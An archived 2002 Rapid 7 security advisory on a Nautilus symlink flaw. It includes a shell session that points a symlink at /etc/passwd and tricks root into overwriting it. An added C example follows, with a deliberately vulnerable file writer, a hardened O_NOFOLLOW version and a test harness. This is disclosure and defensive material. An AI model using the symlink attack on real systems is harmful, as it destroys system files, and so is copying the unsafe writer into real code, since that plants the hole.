R7-0003: Nautilus Symlink Vulnerability

From: Joe Testa (jtestaat_private)
Date: Thu May 02 2002 - 13:13:50 PDT


    [ My mail client, Mozilla 1.0 RC1, mangles this advisory and ruins the 
    signature.  See attached file for signed version.]
    
    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    
    _______________________________________________________________________
                       Rapid 7, Inc. Security Advisory
    
              Visit http://www.rapid7.com/ to download NeXpose(tm), our
              advanced vulnerability scanner. Linux and Windows 2000
              versions are available now!
    _______________________________________________________________________
    
    Rapid 7 Advisory R7-0003: Nautilus Symlink Vulnerability
    
        Published:  05/02/2002
        Revision:   1.0
        CVE ID:     CAN-2002-0157
        Bugtraq ID: 4373
    
    
    1. Affected system(s):
    
        KNOWN VULNERABLE:
         o Nautilus 1.0.4
    
        Apparently NOT VULNERABLE:
    
    
    2. Summary
    
        Nautilus is a graphical shell for GNOME.  It contains a vulnerability
        which would allow a malicious user to mount a symlink attack to overwrite
        another user's files.
    
    
    3. Vendor status and information
    
        Nautilus
        Eazel, Inc.
        http://nautilus.eazel.com/
    
        The Nautilus team was notified on 03/26/2002.
    
    
    4. Solution
    
        Upgrade to the latest version of Nautilus, available at
        http://cvs.gnome.org/lxr/source/nautilus/, or apply the appropriate
        patch:
    
    
        RedHat 7.2:
    
        SRPMS:
    ftp://updates.redhat.com/7.2/en/os/SRPMS/nautilus-1.0.4-46.src.rpm
    
        i386:
    ftp://updates.redhat.com/7.2/en/os/i386/nautilus-1.0.4-46.i386.rpm
    ftp://updates.redhat.com/7.2/en/os/i386/nautilus-devel-1.0.4-46.i386.rpm
    ftp://updates.redhat.com/7.2/en/os/i386/nautilus-mozilla-1.0.4-46.i386.rpm
    
        ia64:
    ftp://updates.redhat.com/7.2/en/os/ia64/nautilus-1.0.4-46.ia64.rpm
    ftp://updates.redhat.com/7.2/en/os/ia64/nautilus-devel-1.0.4-46.ia64.rpm
    
    
        Slackware:
    
    ftp://ftp.slackware.com/pub/slackware/slackware-8.0/patches/
    
    
    5. Detailed analysis
    
        When copying files from one directory to another, Nautilus creates a
        small (88+ bytes) XML file called '.nautilus-metafile.xml' in the target
        directory.  It does not check if a symlink with the same name already
        exists there, and blindly writes XML data to it.  The following example
        shows how to cause a system-wide denial of service attack with this
        vulnerability:
    
        [jdog@imisshogs jdog]$ pwd
        /home/jdog
        [jdog@imisshogs jdog]$ cat /etc/passwd
        root:x:0:0:root:/root:/bin/bash
        bin:x:1:1:bin:/bin:/sbin/nologin
        daemon:x:2:2:daemon:/sbin:/sbin/nologin
        adm:x:3:4:adm:/var/adm:/sbin/nologin
        lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
        [...snip...]
        jdog:x:500:500::/home/jdog:/bin/bash
        [jdog@imisshogs jdog]$ ln -s /etc/passwd .nautilus-metafile.xml
        [jdog@imisshogs jdog]$ mail root
        Subject: Yo.
            Could you please copy "creepy-in-new-york.doc" to my home directory
        (/home/jdog)?  Thanks.
    
            - Joe
        Cc: 
        [jdog@imisshogs jdog]$ sleep 86400
        [jdog@imisshogs jdog]$ ls -l *.doc
        -rw-r--r--    1 root     root           13 Mar 24 18:09 creepy-in-new-york.doc
        [jdog@imisshogs jdog]$ cat /etc/passwd
        <?xml version="1.0"?>
        <directory>
        <file name="creepy-in-new-york.doc" icon_position="55,105"/>
        </directory>
        [jdog@imisshogs jdog]$
    
    
    6. Contact Information
    
           Rapid 7 Security Advisories
           Email:   advisoryat_private
           Web:     http://www.rapid7.com/
           Phone:   +1 (212) 558-8700
    
    
    7. Disclaimer and Copyright
    
        Rapid 7, Inc. is not responsible for the misuse of the information
        provided in our security advisories. These advisories are a service
        to the professional security community.  There are NO WARRANTIES
        with regard to this information. Any application or distribution of
        this information constitutes acceptance AS IS, at the user's own
        risk.  This information is subject to change without notice.
    
        This advisory Copyright (C) 2002 Rapid 7, Inc.  Permission is
        hereby granted to redistribute this advisory in electronic media
        only, providing that no changes are made and that the copyright
        notices and disclaimers remain intact.  This advisory may not be
        printed or distributed in non-electronic media without the
        express written permission of Rapid 7, Inc.
    
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.6 (GNU/Linux)
    Comment: For info see http://www.gnupg.org
    
    iD8DBQE80XI+cL76DCfug6wRAjlQAJ0RnxZ7j/ZAHj2gwYk2roTsuGZrXgCfX2HE
    agX4Q4yXM22ZTN0Tm0SVH3U=
    =N4z5
    -----END PGP SIGNATURE-----
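
The bug section 5 describes, shown here as an added example that is not part of the advisory and not Nautilus source: a privileged process writes a predictably named dotfile into a directory another user controls, and `fopen(path, "w")` follows whatever symlink is waiting there. `write_metafile_unsafe` reproduces that behaviour; `write_metafile_safe` is the hardened form, opening with `O_NOFOLLOW` and checking the open descriptor with `fstat` before truncating anything. The function names, the temp-directory layout, the fake passwd line and the stand-in target used instead of /etc/passwd are all assumptions of this example; the patched packages listed in section 4 may fix the problem differently.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Constructed stand-ins: the XML from section 5 and one fake passwd line.
   The real /etc/passwd is never touched. */
static const char METAFILE_XML[] =
    "<?xml version=\"1.0\"?>\n<directory>\n"
    "<file name=\"creepy-in-new-york.doc\" icon_position=\"55,105\"/>\n"
    "</directory>\n";
static const char PASSWD_LINE[] = "root:x:0:0:root:/root:/bin/bash\n";

static void metafile_path(char *out, const char *dir)
{
    snprintf(out, PATH_MAX, "%s/.nautilus-metafile.xml", dir);
}

/* Vulnerable pattern (hypothetical, modelled on the advisory's description,
   not Nautilus source): fopen(path, "w") follows any symlink the directory
   owner planted and truncates its target. Returns 0 on success, -1 on error. */
int write_metafile_unsafe(const char *dir, const char *xml)
{
    char path[PATH_MAX];
    metafile_path(path, dir);
    FILE *f = fopen(path, "w");
    if (f == NULL) return -1;
    fputs(xml, f);
    return fclose(f);
}

/* Hardened form: O_NOFOLLOW makes open(2) fail (errno ELOOP on Linux) when
   the final component is a symlink. O_TRUNC is omitted on purpose so the
   fstat checks on the open descriptor run before anything is destroyed;
   they also reject a planted hard link (st_nlink > 1) or a non-regular file. */
int write_metafile_safe(const char *dir, const char *xml)
{
    char path[PATH_MAX];
    struct stat st;
    metafile_path(path, dir);
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW, 0644);
    if (fd < 0) return -1;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_nlink > 1) {
        close(fd); errno = EPERM; return -1;
    }
    if (ftruncate(fd, 0) < 0 || write(fd, xml, strlen(xml)) < 0) {
        close(fd); return -1;
    }
    return close(fd);
}

/* The attacker's layout from section 5 in a fresh temp dir: a fake passwd
   file with '.nautilus-metafile.xml' symlinked to it (the 'ln -s' step). */
static int setup(char *dir, char *target, char *link)
{
    strcpy(dir, "/tmp/r7-0003.XXXXXX");
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(target, PATH_MAX, "%s/passwd", dir);
    FILE *f = fopen(target, "w");
    if (f == NULL) return -1;
    fputs(PASSWD_LINE, f);
    fclose(f);
    metafile_path(link, dir);
    return symlink(target, link);
}

/* 1 if the fake passwd file still holds its original line. */
static int target_is_intact(const char *target)
{
    char buf[256] = {0};
    FILE *f = fopen(target, "r");
    if (f == NULL) return 0;
    size_t n = fread(buf, 1, sizeof buf - 1, f); buf[n] = 0;
    fclose(f);
    return strcmp(buf, PASSWD_LINE) == 0;
}

/* Runs one writer against the planted symlink and cleans up. Returns 1 if
   the target was clobbered (the advisory's outcome), 2 if the writer refused
   with ELOOP and the target survived, 0 for anything else, -1 on setup failure. */
int run_against_symlink(int (*writer)(const char *, const char *))
{
    char dir[PATH_MAX], target[PATH_MAX], link[PATH_MAX];
    if (setup(dir, target, link) < 0) return -1;
    int rc = writer(dir, METAFILE_XML), err = errno;
    int intact = target_is_intact(target);
    unlink(link); unlink(target); rmdir(dir);
    if (rc == 0 && !intact) return 1;
    if (rc == -1 && err == ELOOP && intact) return 2;
    return 0;
}
```

Build with `cc -Wall -o r7-0003 r7-0003.c` and call `run_against_symlink` with each writer: the unsafe one returns 1 (the fake passwd file now holds the XML, exactly what the `cat /etc/passwd` at the end of section 5 shows) and the hardened one returns 2. Two points worth noting. `O_NOFOLLOW` only blocks symlinks; on a kernel that lets an unprivileged user hard-link a file they do not own, the attacker can plant a hard link to the target on the same filesystem instead, which is why the `st_nlink > 1` check is there. And the checks run on the already-open descriptor rather than on the path, so there is no window between an `lstat` and the `open` in which the attacker can swap the file.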
    



    This archive was generated by hypermail 2b30 : Thu May 02 2002 - 14:54:29 PDT